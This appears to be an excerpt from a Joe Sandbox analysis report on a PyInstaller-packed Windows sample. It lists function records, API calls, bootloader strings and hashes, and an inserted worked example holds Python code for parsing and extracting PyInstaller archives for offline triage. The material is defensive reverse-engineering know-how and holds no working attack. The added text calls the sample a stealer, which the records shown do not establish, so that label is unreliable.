                                                            • Instruction ID: 9e1e7fff09d2b06fdefa26a9df734e0f838b20385a096a3e2cbfb6a9e6f80f0c
                                                            • Opcode Fuzzy Hash: 9142216fe1597e1c9e17d458b54f40fc9f4f49d9b38e9defbc386d8b2912fed3
                                                            • Instruction Fuzzy Hash: B7B19321E1C64B41EB65BB2994A22FDD350BF6679CFC40131EB4D4B69EDEACE605C320

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                            • String ID: CreateProcessW$Error creating child process!
                                                            • API String ID: 2895956056-3524285272
                                                            • Opcode ID: 3741643826c5352320942fbf43c5de1d0e179915c125a0ccfc2097356f541c1c
                                                            • Instruction ID: 810d496dcac2159572d4b92a7a113a89e0c002fcce1a0808f777c18e92b81f15
                                                            • Opcode Fuzzy Hash: 3741643826c5352320942fbf43c5de1d0e179915c125a0ccfc2097356f541c1c
                                                            • Instruction Fuzzy Hash: 7C413731A0878581DB20AB69F4452AAF354FFA6364F900735E7AD437D9DFBCD0548B50

                                                            Control-flow Graph

                                                            • Graph omitted (interactive rendering not recoverable); function entry 7ff7b10f1050, blocks 7ff7b10f1050-7ff7b10f1298, error exits through 7ff7b10f2b10; no direct Win32 API calls in the graph
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                            • API String ID: 2030045667-2813020118
                                                            • Opcode ID: 48627be277d5ca06013e799fe1ac08366ea0a7b8cedd6558f5847aca0920a891
                                                            • Instruction ID: 148fc722e7f1ac53772d82771114fa145404fe0eb89979e6807e875951d49c8f
                                                            • Opcode Fuzzy Hash: 48627be277d5ca06013e799fe1ac08366ea0a7b8cedd6558f5847aca0920a891
                                                            • Instruction Fuzzy Hash: 7B510762A0868680E760BB59A4913BAE391FBA279CFC44131DF4D8779DEEBCE415C710
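
Worked example (added here; it is not part of the Joe Sandbox report and not PyInstaller's own code). The three function records above carry the PyInstaller bootloader's archive-open strings ("Failed to read cookie!", "Could not read full TOC!", "Cannot open PyInstaller archive from executable (%s) or external archive (%s)") and its extraction strings ("inflateInit() failed", zlib "1.3.1"). The Python below reproduces that open-and-extract path so the embedded Python payload of a sample like this one can be triaged offline without running it: find the 'MEI' cookie from the end of the file (the archive is appended as an overlay), read the table of contents, and inflate an entry. The cookie and TOC layouts are PyInstaller's published bootloader format; the archive bytes, entry names and the python311.dll name are constructed inside the block and are not taken from the sample.

```python
"""Locate and parse a PyInstaller CArchive ('MEI' cookie + TOC) and extract an entry.

Added triage example, not code from the report or from PyInstaller. Layout used:
  cookie  '!8sIIii64s' -> magic, archive length, TOC offset, TOC length,
                          Python version, Python DLL name (offsets relative to
                          the archive start; the cookie sits at the archive end)
  TOC     repeated '!iIIIBc' + NUL-padded name -> entry length, data offset,
          compressed length, uncompressed length, compression flag, type code
Entries whose compression flag is 1 are zlib-deflated.
"""
import struct
import zlib

MAGIC = b"MEI\014\013\012\013\016"           # 8-byte cookie magic the bootloader scans for
COOKIE_FMT = "!8sIIii64s"                   # magic, pkg len, TOC off, TOC len, pyvers, DLL name
COOKIE_LEN = struct.calcsize(COOKIE_FMT)    # 88 bytes
TOC_HDR_FMT = "!iIIIBc"                     # entry len, data off, clen, ulen, cflag, typecode
TOC_HDR_LEN = struct.calcsize(TOC_HDR_FMT)  # 18 bytes


def find_cookie(blob: bytes) -> int:
    """Offset of the last cookie magic (archive is an appended overlay), or -1."""
    return blob.rfind(MAGIC)


def parse_archive(blob: bytes) -> dict:
    """Read cookie and TOC; the checks mirror the bootloader's error strings."""
    cookie_off = find_cookie(blob)
    if cookie_off < 0 or cookie_off + COOKIE_LEN > len(blob):
        raise ValueError("Failed to read cookie: no PyInstaller archive found")
    magic, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack_from(
        COOKIE_FMT, blob, cookie_off)
    # Archive start = end of cookie minus the archive length stored in the cookie.
    pkg_start = cookie_off + COOKIE_LEN - pkg_len
    if pkg_start < 0:
        raise ValueError("cookie length field exceeds file size")
    toc = blob[pkg_start + toc_off: pkg_start + toc_off + toc_len]
    if len(toc) != toc_len:
        raise ValueError("Could not read full TOC")
    entries, pos = [], 0
    while pos < toc_len:
        entry_len, data_off, clen, ulen, cflag, typecode = struct.unpack_from(
            TOC_HDR_FMT, toc, pos)
        if entry_len < TOC_HDR_LEN or pos + entry_len > toc_len:
            raise ValueError("corrupt TOC entry")
        name = toc[pos + TOC_HDR_LEN: pos + entry_len].split(b"\0", 1)[0]
        entries.append({"name": name.decode("utf-8"), "offset": pkg_start + data_off,
                        "clen": clen, "ulen": ulen, "compressed": cflag == 1,
                        "type": typecode.decode()})
        pos += entry_len
    return {"pkg_start": pkg_start, "pyvers": pyvers,
            "pylib": pylib.rstrip(b"\0").decode(), "entries": entries}


def extract_entry(blob: bytes, entry: dict) -> bytes:
    """Slice the entry, inflate if flagged, and size-check like the bootloader's extract step."""
    raw = blob[entry["offset"]: entry["offset"] + entry["clen"]]
    if len(raw) != entry["clen"]:
        raise ValueError("truncated entry")
    data = zlib.decompress(raw) if entry["compressed"] else raw
    if len(data) != entry["ulen"]:
        raise ValueError("decompressed size mismatch")
    return data


def build_sample_archive(prefix: bytes, files: list) -> bytes:
    """Constructed input: a minimal archive appended to a fake PE 'prefix'.
    files: list of (name, typecode, payload, compress). Not a real sample."""
    body, toc = bytearray(), bytearray()
    for name, typecode, payload, compress in files:
        data = zlib.compress(payload, 9) if compress else payload
        off = len(body)
        body += data
        nm = name.encode("utf-8") + b"\0"
        entry_len = TOC_HDR_LEN + len(nm)
        entry_len += (-entry_len) % 16                # pad entry to a 16-byte boundary
        toc += struct.pack(TOC_HDR_FMT, entry_len, off, len(data), len(payload),
                           1 if compress else 0, typecode.encode())
        toc += nm.ljust(entry_len - TOC_HDR_LEN, b"\0")
    toc_off = len(body)
    pkg_len = toc_off + len(toc) + COOKIE_LEN
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, toc_off, len(toc),
                         0x030B, b"python311.dll")   # assumed DLL name
    return prefix + bytes(body) + bytes(toc) + cookie


if __name__ == "__main__":
    blob = build_sample_archive(b"MZ" + b"\x90" * 300, [
        ("pyi-contents-directory", "o", b"_internal", False),
        ("entrypoint", "s", b"import os\nprint('constructed script')\n" * 20, True),
    ])
    info = parse_archive(blob)
    for e in info["entries"]:
        print(e["type"], e["name"], e["ulen"], "compressed" if e["compressed"] else "stored")
    print(extract_entry(blob, info["entries"][1])[:40])
```

On a real dropper, read the whole EXE and call parse_archive on it; when the bootloader's "external archive" path is in use instead, parse the side-by-side .pkg file. Entries of type 's' are the scripts executed at start and are the first thing to pull for a stealer like this one.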

                                                            Control-flow Graph

                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF7B110FB4A,?,?,-00000018,00007FF7B110B8F7,?,?,?,00007FF7B110B7EE,?,?,?,00007FF7B1106A32), ref: 00007FF7B110F92C
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7B110FB4A,?,?,-00000018,00007FF7B110B8F7,?,?,?,00007FF7B110B7EE,?,?,?,00007FF7B1106A32), ref: 00007FF7B110F938
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeLibraryProc
                                                            • String ID: api-ms-$ext-ms-
                                                            • API String ID: 3013587201-537541572
                                                            • Opcode ID: 7d0b8cd1019d27a9e16eec9e317f5686f28e1310d53eba994d83145821214b12
                                                            • Instruction ID: e9453cd5f198fc22e2af5cd2831abececc2e7713d4dcfbdd13661308bd0889a2
                                                            • Opcode Fuzzy Hash: 7d0b8cd1019d27a9e16eec9e317f5686f28e1310d53eba994d83145821214b12
                                                            • Instruction Fuzzy Hash: 9F412421F1961B82FB11EB1AB804AB5A391FF26B98F984135DF0D4738CDEBCE5458324

                                                            Control-flow Graph

                                                            • Graph omitted (interactive rendering not recoverable); function entry 7ff7b110c5fc, calls GetConsoleMode (7ff7b110c851), ReadConsoleW (7ff7b110c86f), ReadFile (7ff7b110c8c3) and GetLastError on the failure paths
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 4661795aadc1949d3fbcdb9a4755a9ecd7d0fe9808f7a0d652296c9cb9922c2d
                                                            • Instruction ID: e7cd10ad84129b8f5c3cb0cd28d6cfbd45a62a1f0b5a11bd592623bccca306b1
                                                            • Opcode Fuzzy Hash: 4661795aadc1949d3fbcdb9a4755a9ecd7d0fe9808f7a0d652296c9cb9922c2d
                                                            • Instruction Fuzzy Hash: 47C1E622D0868B91EB50AB1DB0483BDB751EFA2798FA54172DB4D03399DFFCE4458B20

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                            • String ID:
                                                            • API String ID: 995526605-0
                                                            • Opcode ID: b199e8e08dbafb2fefb291e728498370fa2251d2026f483e6f64b3b10aef1c42
                                                            • Instruction ID: bc05fbd4e278d0a1dacf6fbcd77fc5c6bebbb048750174cc103411fa1c206b78
                                                            • Opcode Fuzzy Hash: b199e8e08dbafb2fefb291e728498370fa2251d2026f483e6f64b3b10aef1c42
                                                            • Instruction Fuzzy Hash: CE215835A0CB4281DB50AB5DF485269E3A0FF967A8F600235DB6D47ADCDFACD4548710

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00007FF7B10F8650: GetCurrentProcess.KERNEL32 ref: 00007FF7B10F8670
                                                              • Part of subcall function 00007FF7B10F8650: OpenProcessToken.ADVAPI32 ref: 00007FF7B10F8681
                                                              • Part of subcall function 00007FF7B10F8650: GetTokenInformation.KERNELBASE ref: 00007FF7B10F86A6
                                                              • Part of subcall function 00007FF7B10F8650: GetLastError.KERNEL32 ref: 00007FF7B10F86B0
                                                              • Part of subcall function 00007FF7B10F8650: GetTokenInformation.KERNELBASE ref: 00007FF7B10F86F0
                                                              • Part of subcall function 00007FF7B10F8650: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7B10F870C
                                                              • Part of subcall function 00007FF7B10F8650: CloseHandle.KERNEL32 ref: 00007FF7B10F8724
                                                            • LocalFree.KERNEL32(00000000,00007FF7B10F3B4E), ref: 00007FF7B10F89FC
                                                            • LocalFree.KERNEL32 ref: 00007FF7B10F8A05
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                            • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
                                                            • API String ID: 6828938-1817031585
                                                            • Opcode ID: 4a0a64217b4c8618eeaa0cd08dc669878e89b812572458f449172cc44ebe3956
                                                            • Instruction ID: 2b680102821304253a3946cbd1a5ba502c6091636c9179b905bdd94bf4b8d01c
                                                            • Opcode Fuzzy Hash: 4a0a64217b4c8618eeaa0cd08dc669878e89b812572458f449172cc44ebe3956
                                                            • Instruction Fuzzy Hash: F5218E21A0D74A81FB10FB28E4462E9E365BF66788FD40132EB0D4369EDEBCE5048760
                                                            APIs
                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7B110DAEB), ref: 00007FF7B110DC1C
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7B110DAEB), ref: 00007FF7B110DCA7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ConsoleErrorLastMode
                                                            • String ID:
                                                            • API String ID: 953036326-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _get_daylight$_isindst
                                                            • String ID:
                                                            • API String ID: 4170891091-0
                                                            APIs
                                                            Similarity
                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 1279662727-0
                                                            APIs
                                                            Similarity
                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                            • String ID:
                                                            • API String ID: 3251591375-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: CreateDirectoryMessage
                                                            • String ID: Security descriptor is not initialized!
                                                            • API String ID: 73271072-986317556
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            APIs
                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF7B110B579,?,?,00000000,00007FF7B110B62E), ref: 00007FF7B110B76A
                                                            • GetLastError.KERNEL32(?,?,?,00007FF7B110B579,?,?,00000000,00007FF7B110B62E), ref: 00007FF7B110B774
                                                            Similarity
                                                            • API ID: ChangeCloseErrorFindLastNotification
                                                            • String ID:
                                                            • API String ID: 1687624791-0
                                                            APIs
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            APIs
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B1108519), ref: 00007FF7B11086BF
                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B1108519), ref: 00007FF7B11086D5
                                                            Similarity
                                                            • API ID: Time$System$FileLocalSpecific
                                                            • String ID:
                                                            • API String ID: 1707611234-0
                                                            APIs
                                                            • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF7B1113972,?,?,?,00007FF7B11139AF,?,?,00000000,00007FF7B1113E75,?,?,00000000,00007FF7B1113DA7), ref: 00007FF7B110B502
                                                            • GetLastError.KERNEL32(?,?,?,00007FF7B1113972,?,?,?,00007FF7B11139AF,?,?,00000000,00007FF7B1113E75,?,?,00000000,00007FF7B1113DA7), ref: 00007FF7B110B50C
                                                            Similarity
                                                            • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                            • String ID:
                                                            • API String ID: 588628887-0
                                                            APIs
                                                            Similarity
                                                            • API ID: DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2018770650-0
                                                            APIs
                                                            Similarity
                                                            • API ID: DirectoryErrorLastRemove
                                                            • String ID:
                                                            • API String ID: 377330604-0
                                                            APIs
                                                              • Part of subcall function 00007FF7B10F8BD0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7B10F2A9B), ref: 00007FF7B10F8C0A
                                                            • _findclose.LIBCMT ref: 00007FF7B10F7F99
                                                            Similarity
                                                            • API ID: ByteCharMultiWide_findclose
                                                            • String ID:
                                                            • API String ID: 2772937645-0
                                                            • Opcode ID: f2eb7eeb8a75ce0ecdb705190dd43c37d981f86f995c6e102987c4b14f6ec9f8
                                                            • Instruction ID: ab15f2e01f159de60baaf85e6c28c3efe47409953bd96aab62362e057b592349
                                                            • Opcode Fuzzy Hash: f2eb7eeb8a75ce0ecdb705190dd43c37d981f86f995c6e102987c4b14f6ec9f8
                                                            • Instruction Fuzzy Hash: F171BF53E18AC581EB11DB2CD5462FDA360F7A9B4CF95E321DB8C12596EF68E2D9C300
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                             • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 9bd69e230f0d3b0e5758ab1338c67e81032152045ba6d69f05b41d5745cc01d1
                                                            • Instruction ID: e348ce3537d4ffd9ea303ea5e5a432102ad62f1b77e9ae18457d1f219ea1df6f
                                                            • Opcode Fuzzy Hash: 9bd69e230f0d3b0e5758ab1338c67e81032152045ba6d69f05b41d5745cc01d1
                                                            • Instruction Fuzzy Hash: E041D832D0464983EB24EA1DB545279B350FB67B98F640232D78E826D9CFACE442CB61
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                             • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _fread_nolock
                                                            • String ID:
                                                            • API String ID: 840049012-0
                                                            • Opcode ID: 10c21e676c2fdd7a0020f06bdc09e795063deb41ee1ea4fa70822272de4cf310
                                                            • Instruction ID: e99b3fbd56dc6bd72e37236201d965a4b0442569b88fe90ee52e2c43ffad23c0
                                                            • Opcode Fuzzy Hash: 10c21e676c2fdd7a0020f06bdc09e795063deb41ee1ea4fa70822272de4cf310
                                                            • Instruction Fuzzy Hash: 0F21A221B0C65646EB50BA1A64557FAE751FF56BD8FD88031EF0C077AACEBCE041C620
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                             • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: b8e14b5e39437f3a23779871e591f8317b8e1be46d6eca35f9beed21127490c6
                                                            • Instruction ID: 6c8e9b8e34ade2738ac1937f85f24f6fe03155174ada88ef8228cf75e1ad7389
                                                            • Opcode Fuzzy Hash: b8e14b5e39437f3a23779871e591f8317b8e1be46d6eca35f9beed21127490c6
                                                            • Instruction Fuzzy Hash: BC31A361E1860A85E7507B1DA449378A750EBA6B9CFA10176EB1D073DACEFDE4418B30
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                             • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                            • String ID:
                                                            • API String ID: 3947729631-0
                                                            • Opcode ID: 1e818ce3d7a60ac953b6edb356e5c611bf03bd3223dab8e8a1ec707a6cadd3f1
                                                            • Instruction ID: 8716bd75c4873c5a78e106ef1e142109b700220e038555b421ecac7b2401a634
                                                            • Opcode Fuzzy Hash: 1e818ce3d7a60ac953b6edb356e5c611bf03bd3223dab8e8a1ec707a6cadd3f1
                                                            • Instruction Fuzzy Hash: 9521A132F0574989EB24AF68E4482EC73A0FB1931CFA40635D71C06AC9DFB9D584C760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                             • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                            • Instruction ID: 4f8362f1aa4bbe5e4c04838c13c6ccfaa69f3af9086557e24e48d888d527a5ba
                                                            • Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                            • Instruction Fuzzy Hash: 4A118321E1868981EB60BF59A405279E360EFA6B88FA44031EB4C47A8ADFBCD5408720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                             • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
